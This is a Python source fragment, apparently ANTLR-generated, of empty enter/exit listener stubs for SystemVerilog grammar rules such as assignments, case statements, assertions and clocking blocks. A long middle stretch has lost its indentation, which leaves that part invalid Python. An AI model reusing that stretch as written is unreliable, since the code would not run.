    # Enter a parse tree produced by SystemVerilogParser#edge_indicator.
    def enterEdge_indicator(self, ctx:SystemVerilogParser.Edge_indicatorContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#edge_indicator.
    def exitEdge_indicator(self, ctx:SystemVerilogParser.Edge_indicatorContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#current_state.
    def enterCurrent_state(self, ctx:SystemVerilogParser.Current_stateContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#current_state.
    def exitCurrent_state(self, ctx:SystemVerilogParser.Current_stateContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#next_state.
    def enterNext_state(self, ctx:SystemVerilogParser.Next_stateContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#next_state.
    def exitNext_state(self, ctx:SystemVerilogParser.Next_stateContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#output_symbol.
    def enterOutput_symbol(self, ctx:SystemVerilogParser.Output_symbolContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#output_symbol.
    def exitOutput_symbol(self, ctx:SystemVerilogParser.Output_symbolContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#level_symbol.
    def enterLevel_symbol(self, ctx:SystemVerilogParser.Level_symbolContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#level_symbol.
    def exitLevel_symbol(self, ctx:SystemVerilogParser.Level_symbolContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#edge_symbol.
    def enterEdge_symbol(self, ctx:SystemVerilogParser.Edge_symbolContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#edge_symbol.
    def exitEdge_symbol(self, ctx:SystemVerilogParser.Edge_symbolContext):
        pass
    # NOTE(review): empty listener hooks for UDP instantiation and continuous
    # assignment rules (udp_instantiation .. net_alias). No-op stubs.
    # Enter a parse tree produced by SystemVerilogParser#udp_instantiation.
    def enterUdp_instantiation(self, ctx:SystemVerilogParser.Udp_instantiationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_instantiation.
    def exitUdp_instantiation(self, ctx:SystemVerilogParser.Udp_instantiationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_instance.
    def enterUdp_instance(self, ctx:SystemVerilogParser.Udp_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_instance.
    def exitUdp_instance(self, ctx:SystemVerilogParser.Udp_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#continuous_assign.
    def enterContinuous_assign(self, ctx:SystemVerilogParser.Continuous_assignContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#continuous_assign.
    def exitContinuous_assign(self, ctx:SystemVerilogParser.Continuous_assignContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_net_assignments.
    def enterList_of_net_assignments(self, ctx:SystemVerilogParser.List_of_net_assignmentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_net_assignments.
    def exitList_of_net_assignments(self, ctx:SystemVerilogParser.List_of_net_assignmentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_variable_assignments.
    def enterList_of_variable_assignments(self, ctx:SystemVerilogParser.List_of_variable_assignmentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_variable_assignments.
    def exitList_of_variable_assignments(self, ctx:SystemVerilogParser.List_of_variable_assignmentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#net_alias.
    def enterNet_alias(self, ctx:SystemVerilogParser.Net_aliasContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#net_alias.
    def exitNet_alias(self, ctx:SystemVerilogParser.Net_aliasContext):
        pass
# Enter a parse tree produced by SystemVerilogParser#net_assignment.
def enterNet_assignment(self, ctx:SystemVerilogParser.Net_assignmentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#net_assignment.
def exitNet_assignment(self, ctx:SystemVerilogParser.Net_assignmentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#initial_construct.
def enterInitial_construct(self, ctx:SystemVerilogParser.Initial_constructContext):
pass
# Exit a parse tree produced by SystemVerilogParser#initial_construct.
def exitInitial_construct(self, ctx:SystemVerilogParser.Initial_constructContext):
pass
# Enter a parse tree produced by SystemVerilogParser#always_construct.
def enterAlways_construct(self, ctx:SystemVerilogParser.Always_constructContext):
pass
# Exit a parse tree produced by SystemVerilogParser#always_construct.
def exitAlways_construct(self, ctx:SystemVerilogParser.Always_constructContext):
pass
# Enter a parse tree produced by SystemVerilogParser#always_keyword.
def enterAlways_keyword(self, ctx:SystemVerilogParser.Always_keywordContext):
pass
# Exit a parse tree produced by SystemVerilogParser#always_keyword.
def exitAlways_keyword(self, ctx:SystemVerilogParser.Always_keywordContext):
pass
# Enter a parse tree produced by SystemVerilogParser#final_construct.
def enterFinal_construct(self, ctx:SystemVerilogParser.Final_constructContext):
pass
# Exit a parse tree produced by SystemVerilogParser#final_construct.
def exitFinal_construct(self, ctx:SystemVerilogParser.Final_constructContext):
pass
# Enter a parse tree produced by SystemVerilogParser#blocking_assignment.
def enterBlocking_assignment(self, ctx:SystemVerilogParser.Blocking_assignmentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#blocking_assignment.
def exitBlocking_assignment(self, ctx:SystemVerilogParser.Blocking_assignmentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#operator_assignment.
def enterOperator_assignment(self, ctx:SystemVerilogParser.Operator_assignmentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#operator_assignment.
def exitOperator_assignment(self, ctx:SystemVerilogParser.Operator_assignmentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#assignment_operator.
def enterAssignment_operator(self, ctx:SystemVerilogParser.Assignment_operatorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#assignment_operator.
def exitAssignment_operator(self, ctx:SystemVerilogParser.Assignment_operatorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#nonblocking_assignment.
def enterNonblocking_assignment(self, ctx:SystemVerilogParser.Nonblocking_assignmentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#nonblocking_assignment.
def exitNonblocking_assignment(self, ctx:SystemVerilogParser.Nonblocking_assignmentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#procedural_continuous_assignment.
def enterProcedural_continuous_assignment(self, ctx:SystemVerilogParser.Procedural_continuous_assignmentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#procedural_continuous_assignment.
def exitProcedural_continuous_assignment(self, ctx:SystemVerilogParser.Procedural_continuous_assignmentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#variable_assignment.
def enterVariable_assignment(self, ctx:SystemVerilogParser.Variable_assignmentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#variable_assignment.
def exitVariable_assignment(self, ctx:SystemVerilogParser.Variable_assignmentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#action_block.
def enterAction_block(self, ctx:SystemVerilogParser.Action_blockContext):
pass
# Exit a parse tree produced by SystemVerilogParser#action_block.
def exitAction_block(self, ctx:SystemVerilogParser.Action_blockContext):
pass
# Enter a parse tree produced by SystemVerilogParser#seq_block.
def enterSeq_block(self, ctx:SystemVerilogParser.Seq_blockContext):
pass
# Exit a parse tree produced by SystemVerilogParser#seq_block.
def exitSeq_block(self, ctx:SystemVerilogParser.Seq_blockContext):
pass
# Enter a parse tree produced by SystemVerilogParser#par_block.
def enterPar_block(self, ctx:SystemVerilogParser.Par_blockContext):
pass
# Exit a parse tree produced by SystemVerilogParser#par_block.
def exitPar_block(self, ctx:SystemVerilogParser.Par_blockContext):
pass
# Enter a parse tree produced by SystemVerilogParser#join_keyword.
def enterJoin_keyword(self, ctx:SystemVerilogParser.Join_keywordContext):
pass
# Exit a parse tree produced by SystemVerilogParser#join_keyword.
def exitJoin_keyword(self, ctx:SystemVerilogParser.Join_keywordContext):
pass
# Enter a parse tree produced by SystemVerilogParser#statement_or_null.
def enterStatement_or_null(self, ctx:SystemVerilogParser.Statement_or_nullContext):
pass
# Exit a parse tree produced by SystemVerilogParser#statement_or_null.
def exitStatement_or_null(self, ctx:SystemVerilogParser.Statement_or_nullContext):
pass
# Enter a parse tree produced by SystemVerilogParser#statement.
def enterStatement(self, ctx:SystemVerilogParser.StatementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#statement.
def exitStatement(self, ctx:SystemVerilogParser.StatementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#statement_item.
def enterStatement_item(self, ctx:SystemVerilogParser.Statement_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#statement_item.
def exitStatement_item(self, ctx:SystemVerilogParser.Statement_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#display_tasks.
def enterDisplay_tasks(self, ctx:SystemVerilogParser.Display_tasksContext):
pass
# Exit a parse tree produced by SystemVerilogParser#display_tasks.
def exitDisplay_tasks(self, ctx:SystemVerilogParser.Display_tasksContext):
pass
# Enter a parse tree produced by SystemVerilogParser#display_task_name.
def enterDisplay_task_name(self, ctx:SystemVerilogParser.Display_task_nameContext):
pass
# Exit a parse tree produced by SystemVerilogParser#display_task_name.
def exitDisplay_task_name(self, ctx:SystemVerilogParser.Display_task_nameContext):
pass
# Enter a parse tree produced by SystemVerilogParser#monitor_tasks.
def enterMonitor_tasks(self, ctx:SystemVerilogParser.Monitor_tasksContext):
pass
# Exit a parse tree produced by SystemVerilogParser#monitor_tasks.
def exitMonitor_tasks(self, ctx:SystemVerilogParser.Monitor_tasksContext):
pass
# Enter a parse tree produced by SystemVerilogParser#monitor_task_name.
def enterMonitor_task_name(self, ctx:SystemVerilogParser.Monitor_task_nameContext):
pass
# Exit a parse tree produced by SystemVerilogParser#monitor_task_name.
def exitMonitor_task_name(self, ctx:SystemVerilogParser.Monitor_task_nameContext):
pass
# Enter a parse tree produced by SystemVerilogParser#function_statement.
def enterFunction_statement(self, ctx:SystemVerilogParser.Function_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#function_statement.
def exitFunction_statement(self, ctx:SystemVerilogParser.Function_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#function_statement_or_null.
def enterFunction_statement_or_null(self, ctx:SystemVerilogParser.Function_statement_or_nullContext):
pass
# Exit a parse tree produced by SystemVerilogParser#function_statement_or_null.
def exitFunction_statement_or_null(self, ctx:SystemVerilogParser.Function_statement_or_nullContext):
pass
# Enter a parse tree produced by SystemVerilogParser#variable_identifier_list.
def enterVariable_identifier_list(self, ctx:SystemVerilogParser.Variable_identifier_listContext):
pass
# Exit a parse tree produced by SystemVerilogParser#variable_identifier_list.
def exitVariable_identifier_list(self, ctx:SystemVerilogParser.Variable_identifier_listContext):
pass
# Enter a parse tree produced by SystemVerilogParser#procedural_timing_control_statement.
def enterProcedural_timing_control_statement(self, ctx:SystemVerilogParser.Procedural_timing_control_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#procedural_timing_control_statement.
def exitProcedural_timing_control_statement(self, ctx:SystemVerilogParser.Procedural_timing_control_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#delay_or_event_control.
def enterDelay_or_event_control(self, ctx:SystemVerilogParser.Delay_or_event_controlContext):
pass
# Exit a parse tree produced by SystemVerilogParser#delay_or_event_control.
def exitDelay_or_event_control(self, ctx:SystemVerilogParser.Delay_or_event_controlContext):
pass
# Enter a parse tree produced by SystemVerilogParser#delay_control.
def enterDelay_control(self, ctx:SystemVerilogParser.Delay_controlContext):
pass
# Exit a parse tree produced by SystemVerilogParser#delay_control.
def exitDelay_control(self, ctx:SystemVerilogParser.Delay_controlContext):
pass
# Enter a parse tree produced by SystemVerilogParser#event_control.
def enterEvent_control(self, ctx:SystemVerilogParser.Event_controlContext):
pass
# Exit a parse tree produced by SystemVerilogParser#event_control.
def exitEvent_control(self, ctx:SystemVerilogParser.Event_controlContext):
pass
# Enter a parse tree produced by SystemVerilogParser#event_expression.
def enterEvent_expression(self, ctx:SystemVerilogParser.Event_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#event_expression.
def exitEvent_expression(self, ctx:SystemVerilogParser.Event_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#procedural_timing_control.
def enterProcedural_timing_control(self, ctx:SystemVerilogParser.Procedural_timing_controlContext):
pass
# Exit a parse tree produced by SystemVerilogParser#procedural_timing_control.
def exitProcedural_timing_control(self, ctx:SystemVerilogParser.Procedural_timing_controlContext):
pass
# Enter a parse tree produced by SystemVerilogParser#jump_statement.
def enterJump_statement(self, ctx:SystemVerilogParser.Jump_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#jump_statement.
def exitJump_statement(self, ctx:SystemVerilogParser.Jump_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#wait_statement.
def enterWait_statement(self, ctx:SystemVerilogParser.Wait_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#wait_statement.
def exitWait_statement(self, ctx:SystemVerilogParser.Wait_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#event_trigger.
def enterEvent_trigger(self, ctx:SystemVerilogParser.Event_triggerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#event_trigger.
def exitEvent_trigger(self, ctx:SystemVerilogParser.Event_triggerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#disable_statement.
def enterDisable_statement(self, ctx:SystemVerilogParser.Disable_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#disable_statement.
def exitDisable_statement(self, ctx:SystemVerilogParser.Disable_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#conditional_statement.
def enterConditional_statement(self, ctx:SystemVerilogParser.Conditional_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#conditional_statement.
def exitConditional_statement(self, ctx:SystemVerilogParser.Conditional_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#unique_priority.
def enterUnique_priority(self, ctx:SystemVerilogParser.Unique_priorityContext):
pass
# Exit a parse tree produced by SystemVerilogParser#unique_priority.
def exitUnique_priority(self, ctx:SystemVerilogParser.Unique_priorityContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cond_predicate.
def enterCond_predicate(self, ctx:SystemVerilogParser.Cond_predicateContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cond_predicate.
def exitCond_predicate(self, ctx:SystemVerilogParser.Cond_predicateContext):
pass
# Enter a parse tree produced by SystemVerilogParser#case_statement.
def enterCase_statement(self, ctx:SystemVerilogParser.Case_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#case_statement.
def exitCase_statement(self, ctx:SystemVerilogParser.Case_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#case_keyword.
def enterCase_keyword(self, ctx:SystemVerilogParser.Case_keywordContext):
pass
# Exit a parse tree produced by SystemVerilogParser#case_keyword.
def exitCase_keyword(self, ctx:SystemVerilogParser.Case_keywordContext):
pass
# Enter a parse tree produced by SystemVerilogParser#case_expression.
def enterCase_expression(self, ctx:SystemVerilogParser.Case_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#case_expression.
def exitCase_expression(self, ctx:SystemVerilogParser.Case_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#case_item.
def enterCase_item(self, ctx:SystemVerilogParser.Case_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#case_item.
def exitCase_item(self, ctx:SystemVerilogParser.Case_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#case_pattern_item.
def enterCase_pattern_item(self, ctx:SystemVerilogParser.Case_pattern_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#case_pattern_item.
def exitCase_pattern_item(self, ctx:SystemVerilogParser.Case_pattern_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#case_inside_item.
def enterCase_inside_item(self, ctx:SystemVerilogParser.Case_inside_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#case_inside_item.
def exitCase_inside_item(self, ctx:SystemVerilogParser.Case_inside_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#case_item_expression.
def enterCase_item_expression(self, ctx:SystemVerilogParser.Case_item_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#case_item_expression.
def exitCase_item_expression(self, ctx:SystemVerilogParser.Case_item_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#randcase_statement.
def enterRandcase_statement(self, ctx:SystemVerilogParser.Randcase_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#randcase_statement.
def exitRandcase_statement(self, ctx:SystemVerilogParser.Randcase_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#randcase_item.
def enterRandcase_item(self, ctx:SystemVerilogParser.Randcase_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#randcase_item.
def exitRandcase_item(self, ctx:SystemVerilogParser.Randcase_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#open_range_list.
def enterOpen_range_list(self, ctx:SystemVerilogParser.Open_range_listContext):
pass
# Exit a parse tree produced by SystemVerilogParser#open_range_list.
def exitOpen_range_list(self, ctx:SystemVerilogParser.Open_range_listContext):
pass
# Enter a parse tree produced by SystemVerilogParser#open_value_range.
def enterOpen_value_range(self, ctx:SystemVerilogParser.Open_value_rangeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#open_value_range.
def exitOpen_value_range(self, ctx:SystemVerilogParser.Open_value_rangeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#pattern.
def enterPattern(self, ctx:SystemVerilogParser.PatternContext):
pass
# Exit a parse tree produced by SystemVerilogParser#pattern.
def exitPattern(self, ctx:SystemVerilogParser.PatternContext):
pass
# Enter a parse tree produced by SystemVerilogParser#assignment_pattern.
def enterAssignment_pattern(self, ctx:SystemVerilogParser.Assignment_patternContext):
pass
# Exit a parse tree produced by SystemVerilogParser#assignment_pattern.
def exitAssignment_pattern(self, ctx:SystemVerilogParser.Assignment_patternContext):
pass
# Enter a parse tree produced by SystemVerilogParser#structure_pattern_key.
def enterStructure_pattern_key(self, ctx:SystemVerilogParser.Structure_pattern_keyContext):
pass
# Exit a parse tree produced by SystemVerilogParser#structure_pattern_key.
def exitStructure_pattern_key(self, ctx:SystemVerilogParser.Structure_pattern_keyContext):
pass
# Enter a parse tree produced by SystemVerilogParser#array_pattern_key.
def enterArray_pattern_key(self, ctx:SystemVerilogParser.Array_pattern_keyContext):
pass
# Exit a parse tree produced by SystemVerilogParser#array_pattern_key.
def exitArray_pattern_key(self, ctx:SystemVerilogParser.Array_pattern_keyContext):
pass
# Enter a parse tree produced by SystemVerilogParser#assignment_pattern_key.
def enterAssignment_pattern_key(self, ctx:SystemVerilogParser.Assignment_pattern_keyContext):
pass
# Exit a parse tree produced by SystemVerilogParser#assignment_pattern_key.
def exitAssignment_pattern_key(self, ctx:SystemVerilogParser.Assignment_pattern_keyContext):
pass
# Enter a parse tree produced by SystemVerilogParser#assignment_pattern_expression.
def enterAssignment_pattern_expression(self, ctx:SystemVerilogParser.Assignment_pattern_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#assignment_pattern_expression.
def exitAssignment_pattern_expression(self, ctx:SystemVerilogParser.Assignment_pattern_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#assignment_pattern_expression_type.
def enterAssignment_pattern_expression_type(self, ctx:SystemVerilogParser.Assignment_pattern_expression_typeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#assignment_pattern_expression_type.
def exitAssignment_pattern_expression_type(self, ctx:SystemVerilogParser.Assignment_pattern_expression_typeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_assignment_pattern_expression.
def enterConstant_assignment_pattern_expression(self, ctx:SystemVerilogParser.Constant_assignment_pattern_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_assignment_pattern_expression.
def exitConstant_assignment_pattern_expression(self, ctx:SystemVerilogParser.Constant_assignment_pattern_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#assignment_pattern_net_lvalue.
def enterAssignment_pattern_net_lvalue(self, ctx:SystemVerilogParser.Assignment_pattern_net_lvalueContext):
pass
# Exit a parse tree produced by SystemVerilogParser#assignment_pattern_net_lvalue.
def exitAssignment_pattern_net_lvalue(self, ctx:SystemVerilogParser.Assignment_pattern_net_lvalueContext):
pass
# Enter a parse tree produced by SystemVerilogParser#assignment_pattern_variable_lvalue.
def enterAssignment_pattern_variable_lvalue(self, ctx:SystemVerilogParser.Assignment_pattern_variable_lvalueContext):
pass
# Exit a parse tree produced by SystemVerilogParser#assignment_pattern_variable_lvalue.
def exitAssignment_pattern_variable_lvalue(self, ctx:SystemVerilogParser.Assignment_pattern_variable_lvalueContext):
pass
# Enter a parse tree produced by SystemVerilogParser#loop_statement.
def enterLoop_statement(self, ctx:SystemVerilogParser.Loop_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#loop_statement.
def exitLoop_statement(self, ctx:SystemVerilogParser.Loop_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#for_initialization.
def enterFor_initialization(self, ctx:SystemVerilogParser.For_initializationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#for_initialization.
def exitFor_initialization(self, ctx:SystemVerilogParser.For_initializationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#for_variable_declaration.
def enterFor_variable_declaration(self, ctx:SystemVerilogParser.For_variable_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#for_variable_declaration.
def exitFor_variable_declaration(self, ctx:SystemVerilogParser.For_variable_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#for_step.
def enterFor_step(self, ctx:SystemVerilogParser.For_stepContext):
pass
# Exit a parse tree produced by SystemVerilogParser#for_step.
def exitFor_step(self, ctx:SystemVerilogParser.For_stepContext):
pass
# Enter a parse tree produced by SystemVerilogParser#for_step_assignment.
def enterFor_step_assignment(self, ctx:SystemVerilogParser.For_step_assignmentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#for_step_assignment.
def exitFor_step_assignment(self, ctx:SystemVerilogParser.For_step_assignmentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#loop_variables.
def enterLoop_variables(self, ctx:SystemVerilogParser.Loop_variablesContext):
pass
# Exit a parse tree produced by SystemVerilogParser#loop_variables.
def exitLoop_variables(self, ctx:SystemVerilogParser.Loop_variablesContext):
pass
# Enter a parse tree produced by SystemVerilogParser#subroutine_call_statement.
def enterSubroutine_call_statement(self, ctx:SystemVerilogParser.Subroutine_call_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#subroutine_call_statement.
def exitSubroutine_call_statement(self, ctx:SystemVerilogParser.Subroutine_call_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#assertion_item.
def enterAssertion_item(self, ctx:SystemVerilogParser.Assertion_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#assertion_item.
def exitAssertion_item(self, ctx:SystemVerilogParser.Assertion_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#deferred_immediate_assertion_item.
def enterDeferred_immediate_assertion_item(self, ctx:SystemVerilogParser.Deferred_immediate_assertion_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#deferred_immediate_assertion_item.
def exitDeferred_immediate_assertion_item(self, ctx:SystemVerilogParser.Deferred_immediate_assertion_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#procedural_assertion_statement.
def enterProcedural_assertion_statement(self, ctx:SystemVerilogParser.Procedural_assertion_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#procedural_assertion_statement.
def exitProcedural_assertion_statement(self, ctx:SystemVerilogParser.Procedural_assertion_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#immediate_assertion_statement.
def enterImmediate_assertion_statement(self, ctx:SystemVerilogParser.Immediate_assertion_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#immediate_assertion_statement.
def exitImmediate_assertion_statement(self, ctx:SystemVerilogParser.Immediate_assertion_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#simple_immediate_assertion_statement.
def enterSimple_immediate_assertion_statement(self, ctx:SystemVerilogParser.Simple_immediate_assertion_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#simple_immediate_assertion_statement.
def exitSimple_immediate_assertion_statement(self, ctx:SystemVerilogParser.Simple_immediate_assertion_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#simple_immediate_assert_statement.
def enterSimple_immediate_assert_statement(self, ctx:SystemVerilogParser.Simple_immediate_assert_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#simple_immediate_assert_statement.
def exitSimple_immediate_assert_statement(self, ctx:SystemVerilogParser.Simple_immediate_assert_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#simple_immediate_assume_statement.
def enterSimple_immediate_assume_statement(self, ctx:SystemVerilogParser.Simple_immediate_assume_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#simple_immediate_assume_statement.
def exitSimple_immediate_assume_statement(self, ctx:SystemVerilogParser.Simple_immediate_assume_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#simple_immediate_cover_statement.
def enterSimple_immediate_cover_statement(self, ctx:SystemVerilogParser.Simple_immediate_cover_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#simple_immediate_cover_statement.
def exitSimple_immediate_cover_statement(self, ctx:SystemVerilogParser.Simple_immediate_cover_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#deferred_immediate_assertion_statement.
def enterDeferred_immediate_assertion_statement(self, ctx:SystemVerilogParser.Deferred_immediate_assertion_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#deferred_immediate_assertion_statement.
def exitDeferred_immediate_assertion_statement(self, ctx:SystemVerilogParser.Deferred_immediate_assertion_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#deferred_immediate_assert_statement.
def enterDeferred_immediate_assert_statement(self, ctx:SystemVerilogParser.Deferred_immediate_assert_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#deferred_immediate_assert_statement.
def exitDeferred_immediate_assert_statement(self, ctx:SystemVerilogParser.Deferred_immediate_assert_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#deferred_immediate_assume_statement.
def enterDeferred_immediate_assume_statement(self, ctx:SystemVerilogParser.Deferred_immediate_assume_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#deferred_immediate_assume_statement.
def exitDeferred_immediate_assume_statement(self, ctx:SystemVerilogParser.Deferred_immediate_assume_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#deferred_immediate_cover_statement.
def enterDeferred_immediate_cover_statement(self, ctx:SystemVerilogParser.Deferred_immediate_cover_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#deferred_immediate_cover_statement.
def exitDeferred_immediate_cover_statement(self, ctx:SystemVerilogParser.Deferred_immediate_cover_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#clocking_declaration.
def enterClocking_declaration(self, ctx:SystemVerilogParser.Clocking_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#clocking_declaration.
def exitClocking_declaration(self, ctx:SystemVerilogParser.Clocking_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#clocking_event.
def enterClocking_event(self, ctx:SystemVerilogParser.Clocking_eventContext):
pass
# Exit a parse tree produced by SystemVerilogParser#clocking_event.
def exitClocking_event(self, ctx:SystemVerilogParser.Clocking_eventContext):
pass
# Enter a parse tree produced by SystemVerilogParser#clocking_item.
def enterClocking_item(self, ctx:SystemVerilogParser.Clocking_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#clocking_item.
def exitClocking_item(self, ctx:SystemVerilogParser.Clocking_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#default_skew.
def enterDefault_skew(self, ctx:SystemVerilogParser.Default_skewContext):
pass
# Exit a parse tree produced by SystemVerilogParser#default_skew.
def exitDefault_skew(self, ctx:SystemVerilogParser.Default_skewContext):
pass
# Enter a parse tree produced by SystemVerilogParser#clocking_direction.
def enterClocking_direction(self, ctx:SystemVerilogParser.Clocking_directionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#clocking_direction.
def exitClocking_direction(self, ctx:SystemVerilogParser.Clocking_directionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#list_of_clocking_decl_assign.
    # NOTE(review): ANTLR4-generated no-op ParseTreeListener stubs (enter/exit
    # pairs for the clocking, randsequence, specify-block, timing-check and
    # concatenation grammar rules). Each method intentionally does nothing;
    # consumers override the enter*/exit* hooks they care about in a subclass.
    # This file appears machine-generated from the SystemVerilog grammar —
    # do not hand-edit logic here, as regeneration would clobber local changes.
    def enterList_of_clocking_decl_assign(self, ctx:SystemVerilogParser.List_of_clocking_decl_assignContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_clocking_decl_assign.
    def exitList_of_clocking_decl_assign(self, ctx:SystemVerilogParser.List_of_clocking_decl_assignContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#clocking_decl_assign.
    def enterClocking_decl_assign(self, ctx:SystemVerilogParser.Clocking_decl_assignContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#clocking_decl_assign.
    def exitClocking_decl_assign(self, ctx:SystemVerilogParser.Clocking_decl_assignContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#clocking_skew.
    def enterClocking_skew(self, ctx:SystemVerilogParser.Clocking_skewContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#clocking_skew.
    def exitClocking_skew(self, ctx:SystemVerilogParser.Clocking_skewContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#clocking_drive.
    def enterClocking_drive(self, ctx:SystemVerilogParser.Clocking_driveContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#clocking_drive.
    def exitClocking_drive(self, ctx:SystemVerilogParser.Clocking_driveContext):
        pass
